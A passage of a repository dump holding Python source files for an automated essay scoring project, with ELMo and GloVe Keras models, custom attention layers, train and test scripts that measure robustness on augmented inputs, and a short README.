scope=\"^{}_module/.*\".format(self.name))\n super(ElmoEmbeddingLayer, self).build(input_shape)\n\n def compute_elmo(self, x):\n\n msk = K.not_equal(x, PAD_SENT_TOKEN) # (maxlen,)\n x = tf.boolean_mask(x, msk) # (?, )\n emb = self.elmo(x,\n as_dict=False,\n signature='default')\n emb.set_shape((None, 1024)) # (?, 1024)\n s = tf.shape(emb)\n paddings = [[0, self.maxlen - s[0]], [0, 0]]\n # paddings = tf.Print(paddings, [paddings], '--- padding : ')\n pad = tf.pad(emb, paddings, 'CONSTANT', constant_values=0.)\n pad = tf.ensure_shape(pad, (self.maxlen, 1024)) # (maxlen, 1024)\n return pad\n\n def call(self, inputs, mask=None):\n print(inputs.shape)\n sqz_inputs = tf.squeeze(K.cast(inputs, tf.string), axis=2)\n embs = tf.map_fn(self.compute_elmo, sqz_inputs, dtype=tf.float32)\n return embs\n\n def compute_output_shape(self, input_shape):\n return (input_shape[0], 
input_shape[1], self.dimensions)\n\n\ndef softmax_wrapper(x):\n    return softmax(x, axis=1)\n\n\ndef sum_attention(x):\n    return K.sum(x, axis=1)\n\n\ndef permute(x):\n    return tf.transpose(x, perm=[1, 0, 2])\n\n\ndef build_elmo_model_full(prompt, elmo_trainable=False, only_elmo=False, use_mask=True, lstm_units=100, drop_rate=None, summary=True):\n    maxlen = MAXLEN[prompt]\n    elmo = ElmoEmbeddingLayer(maxlen, trainable=elmo_trainable)\n\n    input_text = Input(shape=(maxlen, 1), dtype=tf.string)\n    embedding = elmo(input_text)\n    if drop_rate is not None and drop_rate > 0.:\n        embedding = Dropout(drop_rate)(embedding)\n    if use_mask:\n        embedding = Masking(mask_value=0.0)(embedding)\n    if not only_elmo:\n        H = LSTM(lstm_units, return_sequences=True, name='lstm')(embedding)\n        A_hat = Dense(lstm_units, activation='tanh', name='Attention_mat')(H)\n        a = Dense(1, use_bias=False, activation=softmax_wrapper,\n                  name='Attention_vec')(A_hat)\n        o = Dot(1, name='')([a, H])\n        o = Flatten()(o)\n        score = Dense(1, activation='sigmoid', name='sigmoid')(o)\n        model = Model(inputs=input_text, outputs=score)\n    else:\n        model = Model(inputs=input_text, outputs=embedding)\n    model.compile(loss='mse', optimizer='adam')\n    if summary:\n        model.summary()\n    return model\n\n\ndef build_elmo_model(input_shape_tuple, dropout, lstm_units):\n\n    inputs = Input(\n        shape=(input_shape_tuple[0], input_shape_tuple[1]), name='inputs')\n    input_dropout = Dropout(dropout, name='dropout')(inputs)\n    H = LSTM(lstm_units, return_sequences=True, name='lstm')(input_dropout)\n    A_hat = Dense(lstm_units, activation='tanh', name='Attention_mat')(H)\n    a = Dense(1, use_bias=False, activation=softmax_wrapper,\n              name='Attention_vec')(A_hat)\n    o = Dot(1, name='')([a, H])\n    o = Flatten()(o)\n    score = Dense(1, activation='sigmoid', name='sigmoid')(o)\n    model = Model(inputs=inputs, outputs=score)\n    model.compile(loss='mse', optimizer='rmsprop')\n    return model\n\n\ndef build_elmo_model_old(input_shape_tuple, dropout, lstm_units):\n    inputs = Input(\n        shape=(input_shape_tuple[0], input_shape_tuple[1]), name='inputs')\n    dropout = Dropout(dropout, name='dropout')(inputs)\n    lstm = LSTM(lstm_units, return_sequences=True, name='lstm')(dropout)\n    A = Dense(lstm_units, activation='tanh', name='Attention_mat')(lstm)\n    alpha = Dense(1, use_bias=False, activation=None, name='Attention_vec')(A)\n    alpha = Reshape((input_shape_tuple[0],))(alpha)\n    alpha = Activation('softmax')(alpha)\n    alpha_re = RepeatVector(lstm_units)(alpha)\n    alpha_perm = Permute((2, 1))(alpha_re)\n    attention_mul = Multiply()([lstm, alpha_perm])\n    out = Lambda(sum_attention, output_shape=None)(attention_mul)\n    out = Dense(1, activation='sigmoid', name='sigmoid')(out)\n    model = Model(inputs=inputs, outputs=out)\n    model.compile(loss='mse', optimizer='rmsprop')\n    return model\n\n\ndef get_layer_out(model, layer_index, data):\n    intermediate_model = Model(inputs=model.input,\n                               outputs=model.get_layer(index=layer_index).output)\n    layer_out = intermediate_model.predict(data)\n    return layer_out\n\n\ndef get_intermediate_outputs(model, data, layer_indices, layer_names):\n    outputs = dict()\n    # layer_indices = [2,3,4,6,11]\n    # layer_names = ['lstm','AttW','AttV','softmax','out']\n    # layer_indices = [2, 6, 11]\n    # layer_names = ['lstm', 'softmax', 'out']\n    for i in range(len(layer_indices)):\n        layer_out = get_layer_out(model, layer_indices[i], data)\n        outputs[layer_names[i]] = layer_out\n        del layer_out\n    return outputs\n\n\ndef get_model(prompt, fold, show_summary=False):\n    K.clear_session()\n    yaml_string = open(\n        
'architecture/elmo_lstm_fix_data_prompt_{}.yml'.format(prompt), 'r').read()\n model = model_from_yaml(yaml_string)\n model.load_weights(\n 'weight/elmo_lstm_fix_data_prompt_{}_fold_{}.BEST.h5'.format(prompt, fold))\n if show_summary:\n model.summary()\n return model\n\n\ndef build_glove_model(prompt, vocab_size, emb_matrix, glove_trainable=False, drop_rate=None, maxwords=50, emb_dim=50, summary=True):\n maxlen = MAXLEN[prompt]\n maxwords = MAXWORDLEN\n input_word = Input(shape=(maxlen, maxwords,), dtype='int32')\n x = Reshape((maxlen * maxwords,))(input_word)\n emb = Embedding(input_dim=vocab_size, output_dim=emb_dim, weights=[emb_matrix],\n trainable=glove_trainable, mask_zero=True, name='glove')(x)\n x = ZeroMaskedEntries()(emb)\n x = Dropout(drop_rate)(x)\n x = Reshape((maxlen, maxwords, emb_dim))(x)\n x = TimeDistributed(Convolution1D(\n filters=100, kernel_size=5, padding='valid'), name='zcnn')(x)\n x = TimeDistributed(FeiDongAttention(), name='avg_zcnn')(x)\n\n x = LSTM(units=100, return_sequences=True, name='hz_lstm')(x)\n x = FeiDongAttention(name='avg_hz_lstm')(x)\n score = Dense(1, activation='sigmoid',\n name='output')(x)\n model = Model(input_word, score)\n model.compile(loss='mse', optimizer='rmsprop')\n if summary:\n model.summary()\n return model\n\n\nclass ZeroMaskedEntries(Layer):\n \"\"\"\n This layer is called after an Embedding layer.\n It zeros out all of the masked-out embeddings.\n It also swallows the mask without passing it on.\n You can change this to default pass-on behavior as follows:\n\n def compute_mask(self, x, mask=None):\n if not self.mask_zero:\n return None\n else:\n return K.not_equal(x, 0)\n \"\"\"\n\n def __init__(self, **kwargs):\n self.support_mask = True\n super(ZeroMaskedEntries, self).__init__(**kwargs)\n\n def build(self, input_shape):\n self.output_dim = input_shape[1]\n self.repeat_dim = input_shape[2]\n\n def call(self, x, mask=None):\n mask = K.cast(mask, 'float32')\n mask = K.repeat(mask, self.repeat_dim)\n mask = K.permute_dimensions(mask, (0, 2, 1))\n return x * mask\n\n def compute_mask(self, input_shape, input_mask=None):\n return None\n\n\nclass FeiDongAttention(Layer):\n def __init__(self, op='attsum', activation='tanh', init_stdev=0.01, return_attention=False, **kwargs):\n self.supports_masking = True\n self.op = op\n self.activation = activation\n self.init_stdev = init_stdev\n self.return_attention = return_attention\n super(FeiDongAttention, self).__init__(**kwargs)\n\n def build(self, input_shape):\n init_val_v = (np.random.randn(\n input_shape[2]) * self.init_stdev).astype(K.floatx())\n self.att_v = K.variable(init_val_v, name='att_v')\n init_val_W = (np.random.randn(\n input_shape[2], input_shape[2]) * self.init_stdev).astype(K.floatx())\n self.att_W = K.variable(init_val_W, name='att_W')\n self.trainable_weights = [self.att_v, self.att_W]\n\n def call(self, x, mask=None):\n y = K.dot(x, self.att_W)\n weights = tf.tensordot(self.att_v, K.tanh(y), axes=[0, 2])\n weights = K.softmax(weights)\n\n out = x * \\\n K.permute_dimensions(K.repeat(weights, x.shape[2]), [0, 2, 1])\n # print(out.shape)\n out_sum = K.sum(out, axis=1, keepdims=False)\n print(out_sum.shape)\n out_sum = K.cast(out_sum, K.floatx())\n if self.return_attention:\n return weights\n else:\n return out_sum\n\n def compute_output_shape(self, input_shape):\n if self.return_attention:\n return (input_shape[0], input_shape[1])\n else:\n return (input_shape[0], input_shape[2])\n\n def compute_mask(self, x, mask):\n return None\n\n # def get_config(self):\n # config = 
{'op': self.op, 'activation': self.activation,\n # 'init_stdev': self.init_stdev, 'return_attention': self.return_attention}\n # base_config = super(FeiDongAttention, self).get_config()\n # return dict(list(base_config.items()) + list(config.items()))\n" }, { "alpha_fraction": 0.6113123297691345, "alphanum_fraction": 0.6177208423614502, "avg_line_length": 32.23147964477539, "blob_id": "928f74d178fdf32d0295819e5f77ff03948b7dc8", "content_id": "e36135a29bec5c81a86e12411d0a537ea59ab289", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3589, "license_type": "no_license", "max_line_length": 115, "num_lines": 108, "path": "/test.py", "repo_name": "sunnypwang/aes", "src_encoding": "UTF-8", "text": "import sys\nimport argparse\n\nimport os\nimport numpy as np\nfrom keras import backend as K\nfrom keras.callbacks import *\n\nimport utils\nimport data_utils\nimport eval_utils\nimport models\n\nparser = argparse.ArgumentParser()\nparser.add_argument('prompt', type=int, help='-1 for all prompts')\nparser.add_argument('epoch', type=int)\nparser.add_argument('name', type=str, help='model name for path handling')\nparser.add_argument('--bs', type=int, default=5)\nparser.add_argument('--fold', type=int, default=1)\nparser.add_argument('--ft', action='store_true',\n help='enable fine-tuning')\nparser.add_argument('--re', type=int, default=100,\n help='recurrent size (elmo)')\nparser.add_argument('--drop', type=float, default=0.5,\n help='dropout')\nparser.add_argument('--mask', action='store_true')\nparser.add_argument('--augment', type=bool, default=True,\n help='include augment during testing')\nargs = parser.parse_args()\n\nprompts = [args.prompt]\nif args.prompt == -1:\n prompts = [1, 2, 3, 4, 5, 6, 7, 8]\n\nEPOCH = args.epoch\nBATCH_SIZE = args.bs\nMODEL_NAME = args.name\n\nprint(args)\nprint('ALL PROMPTS :', prompts)\nprint('BATCH SIZE :', BATCH_SIZE)\nprint('MODEL_NAME :', MODEL_NAME)\nprint('EPOCH :', EPOCH)\nprint('-------')\n\nfor p in prompts:\n print('PROMPT :', p)\n\n weight_path = utils.mkpath('weight/{}/{}'.format(MODEL_NAME, p))\n weight = utils.get_weight_at_epoch(weight_path, EPOCH)\n if not weight:\n print('weight not found')\n continue\n\n test_df = data_utils.load_data(p, 'test')\n\n print(test_df.shape)\n\n K.clear_session()\n if MODEL_NAME.startswith('elmo'):\n vocab = None\n model = models.build_elmo_model_full(\n p, elmo_trainable=args.ft, use_mask=args.mask, lstm_units=args.re, drop_rate=args.drop, summary=False)\n elif MODEL_NAME.startswith('glove'):\n vocab = data_utils.get_vocab(p)\n glove_path = 'glove/glove.6B.50d.txt'\n emb_matrix = data_utils.load_glove_embedding(glove_path, vocab)\n model = models.build_glove_model(\n p, len(vocab), emb_matrix, glove_trainable=args.ft, drop_rate=args.drop, summary=False)\n\n print('Loading weight :', weight)\n model.load_weights(weight)\n\n test_gen = data_utils.gen(MODEL_NAME,\n p, test_df, vocab, batch_size=BATCH_SIZE, test=True, shuffle=False)\n\n test_steps = np.ceil(len(test_df) / BATCH_SIZE)\n\n print(test_gen, test_steps)\n\n y_true = data_utils.prepare_features(MODEL_NAME,\n df=test_df, prompt=p, vocab=vocab, y_only=True, norm=True)\n\n y_pred = model.predict_generator(\n test_gen, steps=test_steps, verbose=1)\n\n eval_utils.generate_qwk(p, MODEL_NAME, y_true,\n y_pred, EPOCH, suffix='test')\n\n if args.augment:\n print('Predicting on augment sets...')\n aug_pred = {}\n for augment in data_utils.augment_set:\n aug_gen = data_utils.augment_gen(MODEL_NAME,\n p, test_df, 
vocab=vocab, batch_size=BATCH_SIZE, augment=augment)\n            aug_steps = np.ceil(len(test_df) / BATCH_SIZE)\n\n            aug_pred[augment] = model.predict_generator(\n                aug_gen, steps=aug_steps, verbose=1)\n\n        eval_utils.generate_score(\n            p, MODEL_NAME, EPOCH, y_true, y_pred, aug_pred, test_df)\n\n        eval_utils.generate_robustness(\n            p, MODEL_NAME, EPOCH, y_true, y_pred, aug_pred)\n\nif len(prompts) == 8:\n    eval_utils.generate_summary(MODEL_NAME, EPOCH)\n" }, { "alpha_fraction": 0.62806636095047, "alphanum_fraction": 0.6334776282310486, "avg_line_length": 29.130434036254883, "blob_id": "b042f0ac052693f2c4fc3ef71ad308542736b3b3", "content_id": "74d919e23e71a23d84c62266752ba5bb1b975b84", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2772, "license_type": "no_license", "max_line_length": 74, "num_lines": 92, "path": "/elmo_test.py", "repo_name": "sunnypwang/aes", "src_encoding": "UTF-8", "text": "import sys\nimport argparse\nfrom keras.callbacks import *\nimport os\nimport numpy as np\n\nimport utils\nimport data_utils\nimport eval_utils\nimport models\n\nparser = argparse.ArgumentParser()\nparser.add_argument('prompt', type=int, help='-1 for all prompts')\nparser.add_argument('epoch', type=int)\nparser.add_argument('name', type=str, help='model name for path handling')\nparser.add_argument('--bs', type=int, default=5)\nparser.add_argument('--fold', type=int, default=1)\nparser.add_argument('--ft', type=bool, default=False,\n                    help='enable fine-tuning ELMo (elmo_trainable)')\nparser.add_argument('--augment', type=bool, default=True,\n                    help='include augment during testing')\nargs = parser.parse_args()\n\nprompts = [args.prompt]\nif args.prompt == -1:\n    prompts = [1, 2, 3, 4, 5, 6, 7, 8]\n\nEPOCH = args.epoch\nBATCH_SIZE = args.bs\nMODEL_NAME = args.name\n\nprint(args)\nprint('ALL PROMPTS :', prompts)\nprint('BATCH SIZE :', BATCH_SIZE)\nprint('MODEL_NAME :', MODEL_NAME)\nprint('EPOCH :', EPOCH)\nprint('-------')\n\nfor p in prompts:\n    print('PROMPT :', p)\n\n    weight_path = utils.mkpath('weight/{}/{}'.format(MODEL_NAME, p))\n    weight = utils.get_weight_at_epoch(weight_path, EPOCH)\n    if not weight:\n        print('weight not found')\n        continue\n\n    test_df = data_utils.load_data(p, 'test')\n    print(test_df.shape)\n\n    from keras import backend as K\n    K.clear_session()\n    model = models.build_elmo_model_full(\n        p, only_elmo=False, use_mask=True, summary=False)\n\n    print('Loading weight :', weight)\n    model.load_weights(weight)\n\n    test_gen = data_utils.elmo_gen(\n        p, test_df, batch_size=BATCH_SIZE, test=True, shuffle=False)\n    test_steps = np.ceil(len(test_df) / BATCH_SIZE)\n\n    print(test_gen, test_steps)\n\n    y_true = data_utils.prepare_elmo_features(\n        test_df, p, y_only=True, norm=True)\n\n    y_pred = model.predict_generator(\n        test_gen, steps=test_steps, verbose=1)\n\n    eval_utils.generate_qwk(p, MODEL_NAME, y_true,\n                            y_pred, EPOCH, suffix='test')\n\n    if args.augment:\n        print('Predicting on augment sets...')\n        aug_pred = {}\n        for augment in data_utils.augment_set:\n            aug_gen = data_utils.augment_gen(MODEL_NAME,\n                p, test_df, batch_size=BATCH_SIZE, augment=augment)\n            aug_steps = np.ceil(len(test_df) / BATCH_SIZE)\n\n            aug_pred[augment] = model.predict_generator(\n                aug_gen, steps=aug_steps, verbose=1)\n\n        eval_utils.generate_score(\n            p, MODEL_NAME, EPOCH, y_true, y_pred, aug_pred, test_df)\n\n        eval_utils.generate_robustness(\n            p, MODEL_NAME, EPOCH, y_true, y_pred, aug_pred)\n\nif len(prompts) == 8:\n    eval_utils.generate_summary(MODEL_NAME, EPOCH)\n" }, { "alpha_fraction": 
0.7248803973197937, "alphanum_fraction": 0.7296651005744934, "avg_line_length": 25.125, "blob_id": "4e1eb8cb6cb83f2a9a8e3a415b80b5b684b279c5", "content_id": "458f07edaeee4781bf07c36167060c72ab85e250", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 418, "license_type": "no_license", "max_line_length": 74, "num_lines": 16, "path": "/summary.py", "repo_name": "sunnypwang/aes", "src_encoding": "UTF-8", "text": "import eval_utils\nimport argparse\n\nparser = argparse.ArgumentParser()\nparser.add_argument('name', type=str, help='model name for path handling')\nparser.add_argument('--epoch', type=int, default=0)\nargs = parser.parse_args()\n\nEPOCH = args.epoch\nMODEL_NAME = args.name\n\nif EPOCH == 0:\n print('Best epoch mode')\n eval_utils.generate_summary_best(MODEL_NAME)\nelse:\n eval_utils.generate_summary(MODEL_NAME, EPOCH)\n" }, { "alpha_fraction": 0.607299268245697, "alphanum_fraction": 0.6160584092140198, "avg_line_length": 22.620689392089844, "blob_id": "fb4ccdc4fb565b682299f01e3416283667cd1525", "content_id": "c09a352aa768ad21bf16330963a02c24119f33d4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 685, "license_type": "no_license", "max_line_length": 61, "num_lines": 29, "path": "/utils.py", "repo_name": "sunnypwang/aes", "src_encoding": "UTF-8", "text": "import os\nimport glob\n\n\ndef mkpath(path):\n if not os.path.exists(path):\n os.makedirs(path)\n return path + '/'\n\n\ndef get_epoch(x):\n return int(x.split('.')[1].split('_')[2])\n\n\ndef get_last_epoch(weight_path):\n weights = sorted(glob.glob(os.path.join(\n weight_path, 'weight.*.h5')), key=get_epoch)\n last_weight = weights[-1] if weights else None\n last_epoch = get_epoch(last_weight) if last_weight else 0\n return last_weight, last_epoch\n\n\ndef get_weight_at_epoch(weight_path, epoch):\n weights = glob.glob(os.path.join(\n weight_path, 'weight.*.h5'))\n for w in weights:\n if get_epoch(w) == epoch:\n return w\n return None\n" }, { "alpha_fraction": 0.8120805621147156, "alphanum_fraction": 0.8255033493041992, "avg_line_length": 33.38461685180664, "blob_id": "8d81e00c64151c93a254c857066646f35e4b9a31", "content_id": "42f7321447128771d6e81dc76783293df144201e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 447, "license_type": "no_license", "max_line_length": 101, "num_lines": 13, "path": "/README.md", "repo_name": "sunnypwang/aes", "src_encoding": "UTF-8", "text": "# aes\n \nA Comparative Study of Pretrained Language Models for Automated Essay Scoring with Adversarial Inputs\n\nPhakawat Wangkriangkri\n\nDepartment of Computer Engineering, Chulalongkorn University\n\nImplemented with Keras and Tensorflow for GloVe and ELMo models, and Pytorch for BERT model\n\nGloVe model original implementation by https://github.com/feidong1991/aes\n\nElmoEmbeddingLayer based on https://github.com/strongio/keras-elmo/blob/master/Elmo%20Keras.ipynb\n" }, { "alpha_fraction": 0.6288873553276062, "alphanum_fraction": 0.6368348598480225, "avg_line_length": 33.04705810546875, "blob_id": "37b403384db582c729fe810d7ba7994b25d0dce4", "content_id": "1269ef4ef8d367103bcc511cccd60deea53dad64", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2894, "license_type": "no_license", "max_line_length": 166, "num_lines": 85, "path": "/glove_train.py", "repo_name": "sunnypwang/aes", "src_encoding": "UTF-8", "text": "import 
sys\nimport argparse\nimport os\nimport numpy as np\nfrom keras import backend as K\nfrom keras.callbacks import *\n\nimport utils\nimport data_utils\nimport eval_utils\nimport models\n\nparser = argparse.ArgumentParser()\nparser.add_argument('prompt', type=int, help='-1 for all prompts')\nparser.add_argument('epoch', type=int)\nparser.add_argument('name', type=str, help='model name for path handling')\nparser.add_argument('--bs', type=int, default=10)\nparser.add_argument('--fold', type=int, default=1)\nparser.add_argument('--ft', action='store_true',\n help='enable fine-tuning')\nparser.add_argument('--drop', type=float, default=0.5,\n help='dropout')\nargs = parser.parse_args()\n\nprompts = [args.prompt]\nif args.prompt == -1:\n prompts = [1, 2, 3, 4, 5, 6, 7, 8]\n\n\nBATCH_SIZE = args.bs\nMODEL_NAME = args.name\n\nprint(args)\nprint('ALL PROMPTS :', prompts)\nprint('BATCH SIZE :', BATCH_SIZE)\nprint('MODEL_NAME :', MODEL_NAME)\nprint('-------')\n\nfor p in prompts:\n print('PROMPT :', p)\n\n weight_path = utils.mkpath('weight/{}/{}'.format(MODEL_NAME, p))\n last_weight, last_epoch = utils.get_last_epoch(weight_path)\n # move on to next prompt if epoch not greater than last one saved\n if args.epoch <= last_epoch:\n continue\n\n train_df = data_utils.load_data(p, 'train')\n val_df = data_utils.load_data(p, 'val')\n # test_df = data_utils.load_data(p, 'test')\n\n print(train_df.shape)\n print(val_df.shape)\n # print(test_df.shape)\n\n vocab = data_utils.get_vocab(p, train_df)\n glove_path = 'glove/glove.6B.50d.txt'\n emb_matrix = data_utils.load_glove_embedding(glove_path, vocab)\n\n K.clear_session()\n model = models.build_glove_model(\n p, len(vocab), emb_matrix, glove_trainable=args.ft, drop_rate=args.drop)\n\n if last_weight:\n print('Loading weight :', last_weight)\n model.load_weights(last_weight)\n\n train_gen = data_utils.gen(\n MODEL_NAME, p, train_df, vocab, batch_size=BATCH_SIZE)\n val_gen = data_utils.gen(MODEL_NAME,\n p, val_df, vocab, batch_size=BATCH_SIZE, shuffle=False)\n\n train_steps = np.ceil(len(train_df) / BATCH_SIZE)\n val_steps = np.ceil(len(val_df) / BATCH_SIZE)\n\n print(train_steps, val_steps)\n\n callbacks = [ModelCheckpoint(os.path.join(weight_path, 'weight.{}_{}_{{epoch:02d}}_{{val_loss:.4f}}.h5'.format(MODEL_NAME, p)), save_weights_only=True, period=1),\n CSVLogger(os.path.join(\n weight_path, 'history.csv'), append=True),\n eval_utils.EvaluateCallback(p, val_df, MODEL_NAME, vocab=vocab, batch_size=BATCH_SIZE)]\n model.fit_generator(train_gen, steps_per_epoch=train_steps,\n validation_data=val_gen, validation_steps=val_steps,\n epochs=args.epoch, initial_epoch=last_epoch,\n callbacks=callbacks)\n" } ]
10
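The `normalize_score`/`rescale_to_int` pair in the `data_utils.py` record above is easiest to follow with concrete numbers. A small self-contained sketch of the same min-max arithmetic, using the prompt-1 score range `(2, 12)` from `score_range`:

```python
# Round-trip check of the scaling used in data_utils.py (prompt 1 spans 2..12).
low, high = 2, 12

raw = [2, 7, 12]
normalized = [(y - low) / (high - low) for y in raw]             # [0.0, 0.5, 1.0]
resolved = [round(x * (high - low) + low) for x in normalized]   # back to [2, 7, 12]

assert resolved == raw   # rescale_to_int inverts normalize_score exactly
print(normalized, resolved)
```

The assertion mirrors the check inside `normalize_score`, which verifies that rescaling the normalized labels reproduces the original integer scores.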
kate-parshyna/Disease-classification
https://github.com/kate-parshyna/Disease-classification
6791c78a787f6b36de61e0642cd24cd1e99571e5
ea77a7c64815d34ba353a82bea63d2789158cbe3
806a3c76af5641c102b878e4782b956ad7be517a
refs/heads/master
2020-04-08T08:54:50.587464
2018-12-07T14:50:23
2018-12-07T14:50:23
159,199,185
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5776058435440063, "alphanum_fraction": 0.5817022919654846, "avg_line_length": 26.123456954956055, "blob_id": "6706878df5a563fa37fffe8ca5fab1c6b75f4a94", "content_id": "a9f3627b0e3829d9843b2aea8cdec03549a39124", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2197, "license_type": "no_license", "max_line_length": 93, "num_lines": 81, "path": "/desease_detector.py", "repo_name": "kate-parshyna/Disease-classification", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nimport os\nimport json\nimport requests\nimport tempfile\nimport operator\n\nfrom flask import Flask, request, jsonify\nfrom flask_cors import CORS, cross_origin\nfrom werkzeug.utils import secure_filename\nfrom flask import render_template\n\nfrom label_image import get_result\n\n\nUPLOAD_FOLDER = './images'\nALLOWED_EXTENSIONS = set(['png', 'jpg', 'jpeg'])\n\napp = Flask(__name__)\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\n\nCORS(app, support_credentials=True)\n\ndef allowed_file(filename):\n return '.' in filename and \\\n filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS\n\n\[email protected]('/')\ndef index():\n return render_template('index.html')\n\[email protected](\"/detector\", methods=['POST'])\n@cross_origin()\ndef receive_message():\n if request.method == 'POST':\n print(request.files)\n print(request.data)\n print(request.headers['Content-Type'])\n\n if request.headers['Content-Type'] == 'image/jpeg':\n tf = tempfile.NamedTemporaryFile(buffering=-1, dir='images')\n print(tf.name)\n\n filename = '{}.{}'.format(tf.name, request.headers['Content-Type'].split('/')[1])\n\n with open(filename, 'wb') as f:\n f.write(request.data)\n else:\n if 'file' in request.files:\n file = request.files['file']\n print(file)\n elif 'image' in request.files:\n file = request.files['image']\n else:\n return jsonify('No file present')\n\n if file.filename == '':\n return jsonify('No selected file')\n\n if file and allowed_file(file.filename.lower()):\n filename = secure_filename(file.filename.lower())\n file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n\n deseases = get_result(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n\n result = []\n for key in deseases.keys():\n result.append({\n 'name': key,\n 'value': deseases.get(key)\n })\n\n print(result)\n\n return jsonify(result)\n\n\nif __name__ == \"__main__\":\n app.run(threaded=True, host='0.0.0.0')\n" }, { "alpha_fraction": 0.6668526530265808, "alphanum_fraction": 0.6858258843421936, "avg_line_length": 22.246753692626953, "blob_id": "2f4bff9f589f244fcdee820978b1ce9139eb42ac", "content_id": "19f37709abee65fb9ce40b259cb0cedd3df6f2da", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1792, "license_type": "no_license", "max_line_length": 258, "num_lines": 77, "path": "/README.md", "repo_name": "kate-parshyna/Disease-classification", "src_encoding": "UTF-8", "text": "# Disease-classification\n## Overview\nThis program classifies skin diseases. This program use TensorFlow Hub to ingest pre-trained pieces of models, or modules as they are called. 
For starters, we will use the image feature extraction module with the Inception V3 architecture trained on ImageNet\n The model classifies the following diseases:\n \n -couperose;\n -eczema;\n -herpes;\n -ineffective;\n -lichen;\n -normal;\n -pruritus nodular;\n -psoriasis.\n## Installation\nBefore starting the classification, it is necessary to install the modules that are used in this program.\n\nPython instatall: \n````\nsudo apt-get update\n\nsudo apt-get install python3.6\n````\nRequirements install:\n````\nsudo pip3 install tensorflow==1.12.0\n\nsudo pip3 install tensorflow-hub\n\nsudo pip3 install Flask==1.0.2\n\nsudo pip3 install Flask-Cors==3.0.7\n````\n## Usage\n\n### Training\n\nFor classification used Tensorflow inception v3 model. Before starting the training you need to create a data structure.\n\nFolder structure:\n````\ndataset/\n couperose/\n couperose_1.jpg\n couperose_2.jpg\n .\n .\n .\n couperose_n.jpg\n eczema/\n eczema_1.jpg\n eczema_2.jpg\n .\n .\n .\n eczema_n.jpg\n herpes/\n ineffective/\n lichen/\n normal/\n pruritus nodular/\n psoriasis/\n````\nUse this command for retraining:\n\n````\npython3 retrain.py --image_dir path/to/folder/with/dataset/ \n````\n\n### Testing\nIn order to start testing, you need to start the server where the testing will be conducted.\n\nThe server will be started by the following command:\n\n````\npython3 desease_detector.py \n````\nAfter the server is running, you need to go to the server address, where you can see the interface for testing. This is 127.0.0.1:5000.\n\n\n" }, { "alpha_fraction": 0.515999972820282, "alphanum_fraction": 0.6480000019073486, "avg_line_length": 30.375, "blob_id": "0b96b48aa7205c01e5fdb70bf4ef45f8e28e25c1", "content_id": "63d9c5f2277d08e95aad6b109d1972f5dbd544e4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 250, "license_type": "no_license", "max_line_length": 161, "num_lines": 8, "path": "/test.py", "repo_name": "kate-parshyna/Disease-classification", "src_encoding": "UTF-8", "text": "import requests\n\n\nt = {'normal': 0.319, 'psoriasis': 0.029, 'pruritus nodular': 0.019, 'couperose': 0.002, 'ineffective': 0.349, 'lichen': 0.021, 'herpes': 0.257, 'eczema': 0.004}\n\nresult = dict(sorted(t.items(), key=lambda kv: kv[1]))\n\nprint(result)" } ]
3
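The Testing section of the Disease-classification README above stops at starting the server; the `/detector` route itself is easiest to exercise with a short client. A sketch using `requests`, where `sample.jpg` is a hypothetical local test image:

```python
import requests

# Multipart upload, which lands in the request.files['file'] branch of
# receive_message(); 'sample.jpg' is a hypothetical test image.
with open('sample.jpg', 'rb') as f:
    resp = requests.post('http://127.0.0.1:5000/detector',
                         files={'file': ('sample.jpg', f, 'image/jpeg')})

print(resp.json())   # a list of {'name': <disease>, 'value': <score>} entries
```

Because a multipart request carries a `multipart/form-data` Content-Type header, it bypasses the raw `image/jpeg` branch of the handler and goes through the `secure_filename` upload path instead.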
adamkeller2000/sipfin
https://github.com/adamkeller2000/sipfin
77937a63e9597bc922d7b5813ee6705f49b41557
117119c7a766976bebff08bb6e8af0ad02c5ffea
1e4642a795325c2c831a3a60c3dc21c197a7733b
refs/heads/master
2022-10-12T05:41:41.834325
2020-06-06T21:13:44
2020-06-06T21:13:44
270,098,479
1
0
null
2020-06-06T20:38:27
2020-06-06T19:57:18
2020-06-06T19:57:15
null
[ { "alpha_fraction": 0.5986118912696838, "alphanum_fraction": 0.6032388806343079, "avg_line_length": 26.428571701049805, "blob_id": "00b8c4fc6377f3256931c639a1b2eedf6ef0e062", "content_id": "932c81d105e6f5e090a9467f761e4ada4c4accde", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Rust", "length_bytes": 1729, "license_type": "no_license", "max_line_length": 95, "num_lines": 63, "path": "/finox/src/nasdaq/chart.rs", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "use crate::nasdaq::gen;\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct ChartRoot {\n pub data: ChartData,\n pub message: ::serde_json::Value,\n pub status: ::serde_json::Value,\n}\n\nimpl ChartRoot {\n pub fn to_recs(&self) -> Vec<Vec<String>> {\n let symb = self.data.symbol.to_string();\n return self.data\n .chart\n .iter()\n .map(|c| vec![symb.to_string(), c.x.to_string(), c.y.to_string()])\n .collect();\n }\n\n pub fn get_id(&self) -> String {\n let mut id: String = self.data.symbol.to_string();\n id.push('c');\n return id;\n }\n\n //pub fn gen_header(&self) -> Vec<String> {\n // //return vec![\"t\".to_string(), self.data.symbol.to_string()]; //chart header\n // return vec![\"t\".to_string(), self.data.symbol.to_string()]; //chart header\n //}\n}\n\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, 